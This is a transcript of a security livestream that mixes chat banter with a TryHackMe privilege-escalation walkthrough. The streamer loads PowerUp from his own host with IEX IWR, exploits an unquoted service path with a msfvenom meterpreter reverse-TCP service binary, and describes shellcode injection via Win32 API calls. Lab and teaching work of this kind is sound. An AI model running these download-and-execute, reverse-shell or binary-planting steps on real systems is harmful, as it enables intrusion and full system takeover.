hunter must hunt. Must hunt. Must hunt.
Alrighty. Welcome. Welcome, my friends. My good friends. Welcome. How long did it take you to test negative for COVID? I haven't tested. I never actually tested negative. I just still have it. It's like, I still have it forever. It's like Schrodinger's virus. I am constantly in a superposition of both not having COVID and having COVID. I still tested positive even after the symptoms had gone away, I would say. Even after the symptoms had gone, I still tested positive. But yeah. Don't get it before DEF CON? Yeah. I hear it's gonna be masks. It's gonna be masks at DEF CON, which I'm fine with. It's responsible. I don't want anyone to get it. Do we need vaccination proof? Do I need to bring, does anybody know if I need to bring my vaccination stuff, or is it just masks? I think it's just masks. I'll bring my vaccination thing anyway. It's a little fucking card thing. Monkeypox. I don't even know if Vegas has any monkeypox cases yet. Really stupid not requiring vax. Well, they did last year. I'm curious why they're not doing it this year. Like, that's strange to me. That is odd to me that's a little bit odd to me that they don't require vaccination, because they required it last year. But whatever. Doesn't matter. I'm vaxxed. I'll wear a mask. I'll do whatever they want to do. I don't really care. It's such a small inconvenience that I don't really give a shit. Emerson with the first time Prime indoctrination into the cult. Oh, by the way, somebody asked. Yauda. That was my subscription sound is a Bloodborne reference. You can also see more Bloodborne references over my right shoulder. I'm a little bit of a fan of Bloodborne. I would say I'm a little bit of a fan. It is the best game of the last 2 decades. The best game I've played in 2 decades. Or nearly 2 decades. Bloodborne is the tits. What are we doing today? Chad B. Noob is gifting subs. That's what he's doing. Constantine Killer, you've been indoctrinated by Chad B. Noob. Welcome back to the All Has Red team, my friends. Jaron M., thank you for the follow. Cthulhu foughten to you, my friend. Thank you so much, Chad, for your continued and dedicated support of the stream. Bloodborne is my favorite game, too. It's the best game I've played since Legend of Zelda Majora's Mask. I would say my favorite game is Majora's Mask and Ocarina of Time, just because of the nostalgia associated with them. But since then, Bloodborne is definitely my favorite game since then. I was just blown away when I played it. I'd played From Software games before Bloodborne, but Bloodborne was a different animal entirely. Maticus Maximus bringing Yauda into the cult. Welcome, Yauda.
Hunt.
Welcome, Good Hunter. Thank you, Maticus, for your continued and concerted support of the stream as well. Modern Warfare 2, gang. Let me start Shoggothbot really quickly. I forgot to start Shoggothbot again. And I just have to make sure I don't pick the wrong one again. Let's just type. I'm pretty sure I removed the vulnerable code from this version. Let me double check really quick. Yeah, I did remove the vulnerable code. Okay. Okay. And then we execute Shoggothbot. There we go. Are you getting a haircut before DEF CON, or are you maybe getting a I will be getting a haircut before DEF CON. I desperately need a haircut. My hair is far too long. It's out of control. It's out of control up there. I've let it get too long again, if you can believe that. Past CRPT in record time. Fantastic, Killer. Well, nice job. Nice job. Acorn with the raid. Welcome, my friends. Welcome, all. Welcome, everyone. Grab a firm hold of your gognoggles. Welcome. Welcome, everyone. Good to see everybody here. Good to see everyone. We're just getting started. Came in at a great time. We're just getting started. I don't know what we're going to do today. We're going to hack something. Something will be hacked today. We are going to be doing some manner of eldritch magics, of dark arts. I would say probably TryHackMe of some manner. We could do Wreath. We could continue Wreath. I believe we're going into Empire and antivirus evasion next. We could also do some of the newer rooms in TryHackMe. Today's Funday Sunday, so we're just gonna have a good time. Chad B. Noob has indoctrinated Acorn now as well. Acorn has been brought into the fold. Simbin, thank you for the follow. Cthulhu foughten to you, my friend.
A hunter must hunt.
Let me turn down my thermostat really quickly. One sec. dokie artichokey. Alrighty. How's everybody doing? How is everybody's weekend going? Let me get... Okay, that's not... That was... We're gonna have some new YouTube videos coming out soon, by the way. I'm working on a new YouTube video right now. I think what's gonna happen is I'm gonna release the YouTube videos on Patreon and then release them publicly a couple of months later. But I'm going to be doing a series of YouTube videos on process injection. I want to talk about the various process injection techniques. We're going to end calling the Win32 API. It's going to be maybe an introduction to process injection. We'll start with the most simple versions, and we'll work our way up to the more complex ones using system calls and so on and so forth. I do have a GitHub. You can ask Shoggothbot. You can ask Shoggothbot for my socials. I think it's socials? Yeah, there you go. There's my GitHub, my YouTube, my OnlyFans, my email. Show us GitHub. You can have a look at it. The link is right there on screen. Have a look-see. Have a look-see. Alrighty, where is my VM? Where is my VM? I'll tell you what. What about LinkedIn? Yeah, it's easy enough to find my LinkedIn if you just look for it. I'll just leave that the way it is for right now.
A hunter must hunt.
Alrighty, little Dee with the 14-month re-indoctrination into the cult. Welcome back to the All Has Red team. Hi Mac, thank you for the follow. The Net, thank you for the follow. Gambit with the 10-month re-indoctrination. Welcome back. Saxifraga RG, thank you for the follow. What are we doing today? What are we doing today? We could continue Wreath. We could do... Okay. Are we doing Pwn 101? I don't want to... I gotta review GDB again. Like, I have to review GDB again. I am terrible at GDB, and Pwn 101 is going to require GDB. I'm going to need to review that again. I don't want to do it on stream until I've reviewed GDB. I just haven't had time. Like, it's... I've been... Again, I'm trying to improve my content. I know I have to improve my presence on YouTube. I'm trying to work on more YouTube content. And I have DEF CON coming up, so I'm preparing for that. There's lots of stuff going on here. Just did faculty on it. We're not doing any GDB today. No GDB. I do not GDB. I've used GDB 100 times before, and every single time I've used it, I've immediately forgotten how to use it afterwards. Because it's I don't know, I just can't remember the fucking commands. I can't remember how to fucking do it. I just can't remember it. It's so specific and esoteric that you can't remember how GDB works unless you do it literally every single day. Do you need an editor for YouTube? Eventually, I'm probably going to need that. I need to start just making content. Because you don't pay attention? Yeah. I mean, but keep in mind what situation I'm in. I'm on stream in front of a whole bunch of people. I'm trying to pay attention to chat. I'm trying to pay attention to the hacking. I'm trying to pay attention to... there's a lot of things that are going on when I'm on stream. That's why I want to review it. I'm not saying we're not going to do it. I'm saying I just want to review it before I do it on stream. That's all. It's hard to do this stuff on stream, fellas. It just is. And my attention is divided between 50 different things. And yeah, sometimes even on the best of days, I miss stuff. Okay? Even on the best of days, I miss stuff. And it looks like assorted TryHackMe boxes is going to be the thing today. Kerberos in a delegation video would be awesome. Yeah, let me know what kind of videos you want to see. I'm going to start a process injection video, a little bit of programming. But I'm open to other YouTube content. I need to start. One of the ways in which I really need to beef up my content is in YouTube, and again, it's just really hard to have time to do all this kind of crap. Come on. Oh, I forgot this is an incognito window. You're doing great. I don't feel like I'm doing great. I'm in kind of a weird mental health state right these days. All right. You also don't want to burn yourself out. Oh, we're way past burning myself out. I'm definitely burned out. But I can't afford to stop. So we're pushing through. We are pushing through. That's just the nature of things. You just got to learn how to manage it. That's all. Okay, let's do hide completed. Let's do the challenges. Let's do the newest ones. We do like the newest ones, don't we? All right, let's take a look. All right, so what are we interested in on this fine day? What on this fine day? On this fine day, this eldritch majestical I don't even know. I've lost the plot on that one. What on this insane day? Web style CTFs, web challenges. How common is rolling a bare bones custom C2? Not very. You usually yeah, not very. I guess if you're an APT, it'd be pretty common. Take it easy and do some easy box. I'm up to whatever chat wants to see. What does chat want to see? Anything Wireshark would be nice. Did you see my walkthrough of the recent CTF? I just made a CTF for you guys, Ragev, and you use Wireshark for that. This one has brute force. I don't want to do brute force. No brute force. Is there a medium box? There are plenty of medium boxes. They're on the screen right now. Dig Dug, so we learn DNS. Okay, I mean we could throw that in. Let's do. How many easy CTF can you do in 1 hour? Probably less than one, depending on the CTF. If I tried to go as fast as I possibly could, I could probably do a few. Let's see. Dig Dug was recommended. As always, if we get through the first box quickly enough, we'll just do another box. Don't worry. Dig Dug. Oh, here's a Windows one. Quotient. In case anyone wants to see Windows exploitation. We could do Olympus as well. That looks like it says some web application hacking. That's good. Committed for Git stuff. And we'll just throw the most recent one on there too. Agent T. All right, get your votes in. Get your votes in, kids. What are we starting with? Looks like the chat is hungry for Windows. Chat does love to see Windows, don't they? Chat does love Windows. It looks like Quotient is going to be the victor unless one of those other ones gets 20 votes in the next 45 seconds. Oh, it actually just has you RDP in. It's just a privilege escalation. Okay, it'd probably be a quick one. Okay, that's okay. There's no initial access. They're just giving us RDP into the thing. That's okay. I've been on Windows for years and I don't know any exploits for it. We should probably learn some. Dat Guy Kim with the 5 months of Prime. Welcome back. Dizzle Rizzle with the 6 months. Dude, I don't even know. I've been doing this for like 22 months. Or something now. I don't even know where the time is going at this point. Network 90 Black and Crispy Hash Brown. Thank you for the follow.
A hunter must hunt.
All right, let's join the room. I think it'll be a quick one. I think it'll be a quick one, my friends. Which is perfectly fine. We're just getting a nice little warm-up in. Nice little Windows. Nice little Windows warm-up here. All right. Let's go to this. Let's do... TryHackMe Quotient. What the hell was... What the hell? No. I didn't tell you to get smaller. You idiot. Properties. Quotient.
A hunter must hunt.
Thanks again for the amazing CTF.
I appreciate it, Matthias. I'm glad you liked it. I want to do more of them. I'm trying to beef up my YouTube content right now, but we'll do more CTFs in the future. I've got to improve my content. I've been stagnant for too long. I can't just keep doing the same thing over and over again. I know you guys love my CTF content, but I gotta start breaking into the other platforms too. Okay. Alrighty. Let's CD TryHackMe. Victor Quotient. We'll make ourselves a nice working directory. CD Quotient. Okay. There we go. Alrighty. Let's see. Oh, let's connect to the VPN. Go. Mass Effect 3 is a Chad game. Why is Mass Effect 3 coming up? I mean, Mass Effect 2 is the real Chad game. But a lot of problems with Mass Effect 3 come from Mass Effect 2, so I can't really, or as a result of Mass Effect 2's ending. So I can't. So I'll have to criticize it on that. All right, let's start. It looks like we can just RDP in. We don't really need to nmap scan or anything like that. They give us credentials. So we can just do xfree RDP. We can give it the IP address. Sage. It looks like they just want this to be a privilege esca. Am I wrong for liking Andromeda? You're not wrong for liking anything. But the thing you like is bad. You're not wrong for liking it. Like, I enjoy Alien vs. Predator, okay? I enjoy Alien vs. Predator. Alien vs. Predator is objectively a dogshit movie. Especially the second one. They're garbage, okay? I just like to see those wacky extraterrestrials fight. I just really like it, okay? So, I still managed to enjoy Alien vs. Predator. Speaking of Predator, though, who has seen the new Predator movie on Hulu? Prey? Who has seen that? Who has seen Prey? And how great was that? I mean, I had a couple of notes. Like, the dialogue was a little bit too contemporary. Like, the main character's brother goes, like, you just gotta bring it home. And I'm like, isn't bring it home a baseball reference? Yes, the 18th century Native Americans making baseball references. So that was a little bit much for me. But that was like a very minor consideration. In general, I thought this was the best Predator movie since the first Predator movie. I really liked the Predator in this one. He objectively looked the coolest of all the other Predators. He had some weapons we hadn't seen before. Yeah, you need to get good and yeet that guy. Yeah, exactly. That's basically what it was. All right, well, what's the first thing we want to do, chat? What do you guys think? What's the first thing we want to get up to here? I do, by the way, if you do like Predator movies, I do recommend Prey on Hulu. It's free if you have a Hulu subscription. I do definitely recommend it. It's very, very good. It's definitely, if it's your first Predator, I would recommend you go back and watch the original Predator with Arnold Schwarzenegger. That one is the best one. But Prey was quite good. I was surprised that a direct-to-Hulu video movie was so good. And the cinematography was excellent. I really liked some of the shots and the framing. I thought for sure they were going to do the mud thing again, the traditional figuring out that the Predator can't see you if you just cover yourself with mud. But now they had like a flower thing that like lowers your body temperature or something. That was cool. The visual effects were a bit too exaggerated. Dude, hey buddy, it's a movie about an alien. What do you mean they were too exaggerated? Of course they were exaggerated. There's an alien with like laser weapons in it. And they got rid of a lot of like the Predator tropes. Like he didn't blow up the bomb. He didn't do the bomb thing. He didn't have a shoulder cannon, which I was surprised about. I think he's the first Predator we've seen without like one of those plasma shoulder cannons. All right, whatever. We're going to stop talking about Prey. We're actually going to hack this thing. The first thing I want to check is to see if Windows Defender is enabled. Just see if Windows Defender is working here, because if so, we need to account for that. Real-time protection is off. Real-time protection is off, so we're okay. Let's go ahead and open PowerShell and get started. Okay, that's a little bit small. Hopefully everybody can see. So, I do like to, in situations like this on CTFs, I do like to lead with Power Up. Power Up helps me identify a lot of really common privesc vectors, and I have Power Up right here. Power Up is a PowerShell script that will automatically enumerate a number of privesc vectors for us. We'll just start a web server. 10.13.10.69. Nice. Is our IP address. So we can we can IEX IWR http://10.13.10.69. Nice. Oh, there needs to be a space there. And then we need powerup.ps1, and then we need to add use basic parsing. Okay. So we're going to download the script, and invoke expression automatically loads it into memory and gets it ready for execution. Now we just go invoke all checks to execute PowerUp, and we'll see what PowerUp finds for us. How much time did you spend as a pen tester before becoming a red teamer? I was doing red team assessments almost as soon as I was a pen tester, honestly. I proved myself on a couple of basic penetration tests, and then I was put on some red team assessments from there. My latest engagement found me battling AMSI to get power review power up. Did you use one of my bypasses? I have multiple bypasses in my notes. I need to update my notes on Patreon, by the way. I'll do that today. So what do we have here? We have service.exe, dev service. So this looks like something custom. Someone put this in here. It starts as system. Why are we looking at this? Is this an unquoted service path? It looks like this is an unquoted service path, friends. What do you guys think? The path is not quoted. We're noting that the path is not quoted here. Yeah, it's the same thing every time. So it's an unquoted service path. So who needs me to... And you can actually use... we'll do it manually, but you can actually use... you can actually use power up to exploit this automatically. Power up has automatic exploitation functions. It says so. Where does it say unquoted service path? Oh, it says right here. Yeah, it says right here. Okay. So you could query Wimic. You could use Wimic to look at the services. If you didn't want to use power up, you can use Wimic to do this, to enumerate the services. Wimic service. Can we just do Wimic service and see what that gets us? Okay, that is very not filtered. But you can see Wimic just pulls a list of all the services. We probably just want... So we could probably select just a couple of these. The problem is that there are too many columns. So we want the... Is there like a path name? We can just get name and path name, I guess. Wimic service get name path name. There we go. Okay. So you'll see that a lot of these don't have quotes. You'll see that Al, you're like Al, I am tremendously smooth-brained. I'm just kidding. Al, why I see most of these services have unquoted service paths. Have unquoted names. This one has a quote, but all of these do not. So why is power up alerting on the ones that it alerted on, which was, what was it called? Service.exe or something? I'm looking for it. Let's do like a find string. Service.exe, I think, was the name of the executable. Still is not finding it. But all of these have so why yeah, and some of you in chat know. It's because it's not just the fact that it's not a quoted service path. That's not the only reason. Okay? Oh, it's right here. It's right here at the fucking top. I just can't see. Like, that guy who said earlier I don't pay attention was absolutely right. I'm just not paying attention. Again, I'm trying to talk to chat, and I'm not properly reading the output of the files. It's hard to do this stuff live, okay? Now, I know I'm looking. My brand is right here. So why is Power Up alerting on this and not all these other ones? And that's because there are spaces. In order for an unquoted service path to be exploitable, it needs to have spaces in the file name. Why is this? So let's take a look. Let's take a look at. Let's do a quick Notepad stream so I can illustrate this. I'll do this very quickly unless people want a longer explanation. So Windows, for whatever reason, insists upon having spaces in its directories. Ever since, those of you who were unfortunate enough to use Windows XP with documents and settings, know what I'm talking about here. So Windows insists upon the need to have spaces in its file names. I hate it. You hate it. We all hate it. Okay? We all fucking hate it. So, as it turns out, the underlying operating system does not handle spaces very well. It does very strange behavior when encountering spaces. It has a hard time parsing file names with spaces in them. So, when it encounters a path that has spaces, when it encounters a space, the operating system will treat this like the name of a file. So it's going to do like a search path to try and parse the spaces. So the first place that when Windows encounters this path, it's first going to go right here, stop at the space, and go, okay, is there an executable file called program.exe in the C drive? Like in the root of the C drive. Is there a file called program.exe in the root of the C drive? You don't have to have .exe on the end of when you're executing something in Windows. Okay? And if that answer is no, Windows is then going to go to the next space. It's going to follow us to the next space. And it's going to say, okay, in program files, is there a development.exe? It's basically just going to attack a .exe where this space is and see if there's a development.exe. Right? And if it doesn't find that, it's going to go to the next space. And it's going to say, okay, inside of development files, is there a file called debservice.exe? It's going to keep doing this until it reaches the end of the path, or it finds an executable file. And it's going to execute that executable file, assuming it is the service executable. Only after searching these other paths will Windows actually execute service.exe. Does this make sense? I know it's very odd behavior. It's very odd behavior, but Windows has done this since the beginning. It's still doing it now in Windows 11. Okay? We good? So, how is this exploitable, you might ask? Well, if we can gain write access to any of these directories and place a executable and place a malicious executable with the appropriate name in there, then Windows, when it starts up this service, this one right here, Windows, when it starts up this service, will execute this executable instead of this one. Does that make sense, chat? Is everybody following me on this? Perhaps it'll make more sense when we exploit it. Can you put a malicious program.exe so it gets executed when it's parsing? Yes. Yeah. You could put a malicious program.exe, a malicious development.exe in program files if you have write access to program files. You need to have write access to one of these directories. That's the key. You must have write access to one of these directories. When I find, for example, if I'm on a Windows machine and I find it's very common, I find, for users to have write access to the $C share, to have write access to the C drive. It's very common in corporate environments to see that they have write access. And every time I see that, it is I call it a finding. I would say it's a low finding, but it's a finding. Because if there is one of these, if there's an unquoted service path somewhere, then they definitely have a way to exploit it with a writable C drive. Every time. This is the best explanation I've ever heard about unquoted service paths. I hope that it's clearing things up. It's kind of a quick one. Perhaps it'll make more sense as we exploit it here. Okay? So let's go through it. So what we're gonna do, we're gonna use MSF Venom just to make the exploitation simple because antivirus isn't an issue here. So MSF Venom, Windows, x64, Interpreter. In fact, we'll just do the one that I was doing the other night. We need to change the local host to 10.13.10.69. Nice. The sex number. Okay, and we could just write a Cthulhu.exe. Will this work? Does this look good to everybody? Everybody, yep, this will definitely work. What's wrong? Some of you are saying no. Why isn't this good? Well, yeah, it has to be named something different. We get it. I don't know what to name it yet. We're just going to call it Cthulhu.exe. We don't know where is going to be writable. Usually low priv users don't have write access to program files, so my guess is it'll probably be this executable that we put in here. Okay, but I don't actually know that for sure yet. We'll find that out here in a minute. But there's something else that's wrong. EtcSec, wrong exe format. What do you mean by that? It just has to be .exe, right? Just has to be a .exe. I'm outputting an exe. What's the problem? Yeah. So Windows service executables, for whatever fucking reason, are different. Windows service executables, for whatever fucking reason, are different. Okay? Windows requires a special kind of executable for its services. I don't know why. Ask Bill Gates. Okay? Take it up with Bill Gates. Fortunately, MSF Venom can generate this for us too. I think it's service tac exe. We just need to generate a service executable. That's it. I know the name is wrong. You're absolutely right. The name is wrong. We'll change the name when we get it on the system. I don't think Bill knows either. Also, while you're on the topic, ask Bill why he's using backslashes as path delimiters. Ask Bill if he thinks that was a good fucking idea. Just while we're asking Bill Gates shit. Maybe it was exe service. Yeah, it's exe service, not service exe. Tibbs said it worked. You'll probably get a callback, but it'll die immediately. It worked fine with exe? Okay, well, maybe they're using something... A traditional Windows service won't actually work with an exe. It'll call back to you. It'll just die immediately. Your shell will just instantly die. And now that I've said that, watch it not work for some reason. Okay, so we've written Cthulhu.exe to our current working directory here. Let's kill this. We're just going to use a web server. You could also use an SMB server if you wanted to. Totally reasonable. Okay, so now we need to figure out where we have write access to. So let's open this. Let's open up the file explorer here. God, this is almost as slow as my Windows VM on UTM. I just started using UTM, and I'm using it... God, emulating x86 architectures in an ARM environment is fucking slow, dude. It is so slow. It works, but it's slow. It's in program files. And then it's development files. Usually users don't have access to program files. Let's see if we can write here. Yeah, so we can write here. My guess was correct. So what do we need to call it? We need to call it devservice.exe. Just cd in that directory. What's wget? 10.13.10.69. Nice. The sex number. Cthulhu.exe. Okay. And then we can rename Cthulhu.exe to devservice.exe. Where is my executable? Oh, I didn't output it. There it is. Let's go ahead and real quick, let's go to View, Options, change folder and search options, View. I hate that Windows tries to hide file extensions from you. I absolutely loathe that. devservice.exe. Okay. Does that make sense to everybody? Does everyone make sense of what we're doing here? We good? We good, friends? We do need to start MSFDB. Or we need to start MSF console. What? So we've put a malicious executable in this spot so that when Windows tries to parse the unquoted service path, it will find our executable before the legitimate one, which is this one right here. Did you choose dev files randomly? No. I just had write access to this one. I just found that I have write access here. Could you replace the server? Yeah, if you have write access, you could absolutely replace this. If you have write access to this executable, you can absolutely replace this. MSF Venom is creating a malicious executable that's going to generate, that's going to execute a, that's going to give us access as an elevated user. So it's malware, essentially. Use exploit multi-handler. Set lhost 10.13.10.69. Nice. Set local port 8443. Show options. Set payload. Windows x64 interpreter. Reverse TCP. Okay. And we can run that. If we wanted to run it in the background, we could do run tacj, but I don't really care about that. And now we need to restart this. I don't remember how to do it on the command line for some reason off the top of my head, so let's just do services.msc. It makes as much sense as a major operating system designed by autistic kindergarten. Look, I didn't make it, okay? Oh, it's going to be SC. I'm just remembering. It's SC. It's SC stop. SC stop. What was the name of the service? Development service. Okay. SC start. Development service. And we don't get a callback. Not a good sign. What did I do wrong? What hath gone awry? 10.13, 10.69. Windows 64 interpreter, reverse TCP. Yep, that's good. I couldn't get it to work until it was for try net stop. Maybe SC is not working, I guess. Okay, net start development service. Access is denied. So we actually can't restart the service. So we actually cannot restart that service. Reboot? I guess we could.
Hey, listen!
What? What? SC is not SC. Oh, yeah, you're right about that. You're right. I forgot PowerShell doesn't like SC. It's a different thing. It doesn't matter. We don't have access to start it anyways. People are saying reboot, but that's ugly. Yeah, I guess let's try it. Reboot should work if we can reboot the box. What? Unplanned. What the fuck, Bill Gates? Okay. Let's see if we can, let's see if we get a, we should get a callback when the box restarts here. If that works. Oh, yeah, just do shutdown /r/t0. Yeah, sure, perfect. It's so simple. Thanks, Bill Gates. Jay Beers with the 13 months. Welcome back to the All Has Red team, my friend. Thanks for supporting the stream. Jay Lakshmi, Holtzy, Divine Mystic, Beef Supreme, Digit B, Veriso, and Retro Rusty. Thank you for the follows. Well, we'll see if we get a callback here. You gonna call out to us? Do it. Do it, pussy. Oh, looky there. And there we go. Now, does everybody understand how that worked? And we are system. If it checks for any executable, why would we need to rename it? It doesn't check for any executable. It checks for an executable with specifically that name. It looks for an executable specifically in this folder with this name. So it executed itself on boot because that's how services work. Services start when the system boots. Well, services that are designed to start on the system system boot do start when system boots. You could have seen this with let's enter shell really quickly. Let's do SCQC development service. Yeah, auto start. Auto start means that the service automatically starts when the machine boots. Does that make sense? I had to use a TCP reverse shell. Interpreter shell should work just fine. Let's get the flag and we'll move on to the next machine. We got stuff to hack today, guys. Flag.txt. Very classic Windows vulnerability there. You see that a lot in the real world, especially with third-party services. Especially third-party services are real bad about unquoted service paths. There we go. All right, let's move on to the next machine. We're going to knock them out today, okay? What's next, chat? Let's do newest, hide completed. What do we think? You didn't turn it off? It'll turn off on its own, but yeah, I should probably just turn it off. Hang on a second. Let's just to turn off hide completed, go back into Quotient. Let's just exit out of our interpreter. There we go. Let's close this. Okay, we don't have anything else open. Okay. Terminate. Just clean up after ourselves. Wasting TryHackMe resources. Listen, I'm paying for it, okay? I'm paying to waste their resources. I'm a paid subscriber. Not only that, I give them tons of free publicity on this stream. I think they'll live. I'm pretty sure they're gonna be fine, okay? Alright, what's next? What boxes do you want to see? I see Dig Dug. Well, okay, shout out a box if you want to see it. And we'll poll again. Dig Dug, what next? More Windows boxes, please? Well, let's see if we can find any more Windows boxes for you. Well, Kubernetes definitely... I don't even think Kubernetes runs on Windows. The actual Kubernetes daemon, I don't think, runs on Windows, at least. Although Docker does, so maybe it does. I'm looking for more Windows. All signs point to Pwnage. AV evasion, that looks fun. All signs point to Pwnage. We'll put that one in there. Okay, that one, all signs point to Pwnage is Windows. There's your Windows option if you want to beat Windows. We'll put in Olympus for those web enthusiasts. Because it says SQLi in there. Agent T is very recent. People sometimes like seeing the most recent box. And we'll put Dig Dug in there. Dig Dug's already in there. Committed as well. All right, get your votes in. Did you decide whether you're going to buy a Mac? I already have one. I bought a MacBook Pro. I have one of the new M1 MacBook Pros. That's what I was talking about earlier when I said I was trying to get x86 emulation to work on an ARM processor, and it's very slow. Which it's going to be, I understand that, but it's super, super slow. That's okay. I only need them for dev. I only need them for test boxes, so I don't care if it's slow. Did you spec it out to the max? Mine only has 24 gigs. Mine has 64 gigs for virtualization. I probably only needed the 32, but they didn't have one with 32 gigabytes where I bought it. So I just decided to upgrade to the 64. It was only another couple $100 anyways. It looks like all signs point to Pwnage is winning handily. All signs point to Pwnage winning handily right there. But that's okay. People like to see the Windows exploitation. That's all right. I need a new one. I'm still running a 2015 MacBook Pro. The M1 processor is blistering fast. Like, it's super fast. I set up an emulated, I set up a virtual Windows 11, and it booted, it set up so fucking fast. I was like, it boots like instantly. I turn it on, and I turn on the Windows 11 virtual machine, and it just boots instantly. It's just there. But that's because Windows 11 works on ARM processor. I don't have to emulate anything. It's just super, super fast. If I have to emulate the other architecture, it does take a big performance hit, or the Windows machines take a big performance hit. So there is a little bit of a growing pain with the architecture, but I don't think it's the end of the world. Okay, let's go ahead and kill my TMUX session. All signs point to Pwnage has 1, So we'll go ahead and hop on in there. Windows-based digital sign system. How interesting. Are we going to get some ADCS? Perchance? I was worried about writing shellcode for x86. It will not run on an ARM-based architecture. You need to emulate the x86 architecture if you want to run shellcode intended for Intel-based systems. Yeah, like I said, it's a little bit of a few growing pains. Not a big deal. Not a big deal. Okay, we're waiting for it to boot. If it's a domain controller, it's going to take a little bit longer. If it's a domain controller, it will take a little bit longer to boot. Yeah, I have UTM as well. I'm using UTM and Parallels. UTM is mostly just for emulating x86. I do need to emulate x86 architectures for dev purposes. We're going to give it a few extra minutes, chat. Let's do Stream Raiders really quickly. Now's a good time to start up Stream Raiders. I didn't actually start it up. We're going to give it a few minutes. If it's a domain controller, I don't want to scan it. I want to give it like 5 minutes before I scan it. Domain controllers take a little bit longer to spin up. So let's just... what questions do you guys have? Just hit me. Let's talk about something while we're in here. I like the Mac OS so far. I like that it's a Unix-based environment, so the command line I use is bash, or it's CSH, but bash syntax. I like that I could trick out my terminal in the same way that I trick out this Kali. Getting a Kali Linux machine to work was a pain in the ass, actually. The Parallels tools actually don't work for the most recent Kali kernel. So you have to load a Kali kernel from 2021 in order to use Kali Linux with the Parallels tools, which is a pain in the ass. But I guess that's just part of it. I don't really need a fully up-to-date Kali. Thankfully, Windows can run, or the Mac OS environment can run most of the tools I would need to use from it anyways. Hack the Box or TryHackMe for beginners or in general? For beginners, TryHackMe is definitely better. For in general, TryHackMe is probably better. Like I'm kidding. Hack the Box is very good. We love Hack the Box. I have friends over at Hack the Box. They're both really great platforms. I use them both. Hack the Box is more competitive. It focuses more on competition, and on the boxes tend to be a little bit more difficult, but they're more themed. The boxes on TryHackMe, in my opinion, appear to be a little bit more realistic, I would argue. What's the best way to support? Sub or Patreon? I mean, it's up to you, my man. I don't ask for you guys to support. I just take it. If you guys really want to support, if you guys really want to support, I guess Patreon gives you a little bit of extra perks. I'm going to have another video coming out on Patreon here pretty soon. So Patreon has a few extra perks that'll be good. But it's up to you. It's totally up to you. If you'd like to support, I'm happy for any and all support that you guys give. I'm trying to beef up my content right now, predominantly by thinking of new ideas for YouTube videos. Would it be a good? Can I pay you in NFTs? Please do not. Please do not. If you have a particular topic that you'd like to see in YouTube videos, bring it up. I really need YouTube video ideas. I want to start churning out YouTube content. There's not going to be a hot tub stream. Okay, maybe at DEF CON. Maybe if I'm drunk, I'll do one at DEF CON. We'll see. But would it be good to, like, how to set up Kali and VirtualBox from scratch, maybe? Would that be good for you guys to see? Like, how to install VirtualBox and then how to install Kali from that. I'd like a Python series, please. Okay, interesting. If I did a Python programming series, it would probably be specifically focused on like exploitation. I think the M1 dev environment stuff would work well for YouTube content. Yeah, I'm still figuring it out myself. I've spent quite a bit of time already poking at it and figuring it out. It's a little bit of a but I do want to do Mac OS streams. One of the reasons I bought such a beefy machine is that it'll allow me to stream on the go. Like when I travel, I'll be able to stream. I can stream from the laptop itself because the laptop has enough resources to support it. I can stream directly from the laptop, and we can do some Mac OS streams then, which I think will be pretty cool. I can easily emulate another, or virtualize another Mac OS environment, and we can do that. Get some NIM exploitation videos going. That's what I'm working on right now. I'm working on a series of videos where we're going to explore process injection exploitation in NIM. Like how to call the Win32 API, how to inject shellcode into your current process, into another process, how to do it using system calls, how to do it using callback functions, that sort of thing. So that's going to be on the red teaming series, but I'll try to break it down so that anybody can get content out of it. It's going to be broken up into numerous videos. I'm not going to be able to do. Please consider the offensive Python series. Oh yeah, I definitely wanted. That's a good idea to do like an offensive Python series. I need to consider like what I'd want to write. But we could write a variety of things in offensive Python. I think that'd be pretty cool. I think that'd be pretty cool. I could work on some offensive Python projects. I think that'd be pretty neat. Like how to make a simple reverse shell in Python. How to set up an SSL HTTP server in Python, how to make a reverse shell that uses HTTP, like a C2 framework, like a simple Python-based Trojan that uses HTTP to communicate, like a sort of red team stuff. By the way, I think we can finally go ahead and scan this. Dll AllSignsPoint2Pwnage. This week I'm going to DEF CON, but after I get back from DEF CON, we're definitely going to be focused on rolling out some new YouTube instructional content. So hopefully that'll be good for you guys. I'm working on the shellcode, the Python, or not the Python, the NIM process injection stuff as we speak. I was working on it last night, and then I it was very stupid. You know what? Okay, so I'm going to tell you guys... Okay, I'm going to tell you guys an embarrassing story. You guys ready for an embarrassing story? You guys ready for an embarrassing story? I was writing a simple NIM program to call the Windows API. I'm not going to go into specifically what it does. It's very, very simple. Okay, it's very, very simple. But I couldn't find a good example of what I was trying to do on like offensive NIM, on the offensive NIM GitHub, or even on the NIM Hollow GitHub or anything like that. So I was doing it from scratch. I know what calls to make. Like I know I have to call virtual alloc, and then I have to call virtual protect, and then I have to call write process memory, and then I have to call virtual protect, and then I have to call create thread. Okay, so basically, virtual like summing up. I'm gonna go. This is gonna be part of the video. I'm gonna talk about this in the video that I'm working on. Virtual alloc allocates memory in the current process, that is being executed. Allocates a new block of memory, okay? Of a certain size that you specify. Write process memory lets you write to that memory. So you write shellcode into that memory space. And then virtual protect lets you make that memory executable. And then after that, you start create thread, and you point the thread at the entry point to your shellcode. Very simple stuff. Basically, you're creating space in the process memory for your shellcode. You're writing your shellcode into it. You're making it executable, and then you're executing it. Does that make sense? All very simple. and it wouldn't work. Like, the thread just seemed to be crashing. I couldn't figure out why. I spent like an hour on it. I had Prey on in the background, so I was a little bit distracted. This is when I was watching Prey last night. I couldn't get it to work. Sounds extremely easy. It is. It unironically is. It's not hard. But especially in Nim. Nim does make it easy. I'm going to go through this in the video. Don't worry about it right now. Okay? Don't worry about it right now. It's not important. What you should know is it wouldn't execute. Like, it would execute just fine. It would compile, and it would execute. But it would, the shellcode was just popping a message box. I was just trying to get it to pop a message box. That's it. That's like the traditional, like, hello world of shellcode execution. Just getting it to pop a message box. I just couldn't get it to pop the message box. It seemed like it was crashing while the shellcode was running. The shellcode was just crashing. And I'm like, what the fuck? This shellcode is straight from Bytebleeder's repo. What the fuck? I just copied it out of there. I made sure it worked in his example. Oh, yeah. I did put wait for single object is in there, Husky. Create thread does not block. So you have to put wait for single object in there so that the thing doesn't terminate. Anyway, I was like, is the shellcode just crashing? Like, there needs to be some, I finally just decided to generate Meterpreter shellcode, which you actually saw briefly in here. This was me generating Meterpreter shellcode so that I could try it in my program, because the shellcode I had just seemed like it was fucking crashing for no reason. And I threw it in there, and it popped a Meterpreter shell instantly. And then I was like, what the fuck? And then I realized what the problem was. I was compiling it as a console app. All this whole time, I was compiling Nim, the Nim executable as a console app, not a GUI 